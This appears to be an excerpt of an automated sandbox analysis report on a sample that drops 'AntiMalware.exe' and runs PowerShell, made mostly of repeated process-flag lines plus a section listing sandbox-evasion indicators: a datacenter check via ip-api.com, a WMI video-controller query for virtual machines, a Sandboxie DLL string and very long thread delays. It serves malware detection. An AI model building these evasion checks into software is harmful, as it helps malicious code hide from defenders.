                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: KJhsNv2RcI.exe, AntiMalware.exe.0.drBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeMemory allocated: 15B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeMemory allocated: 1B300000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeMemory allocated: 15D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeMemory allocated: 1B1C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeMemory allocated: 27D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeMemory allocated: 1AA60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeMemory allocated: 9D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeMemory allocated: 1A4D0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeWindow / User API: threadDelayed 9573Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6066Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3656Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7910Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1672Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7214Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2253Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7243
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2332
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exe TID: 7556Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep count: 7214 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep count: 2253 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5480Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2316Thread sleep count: 7243 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2316Thread sleep count: 2332 > 30
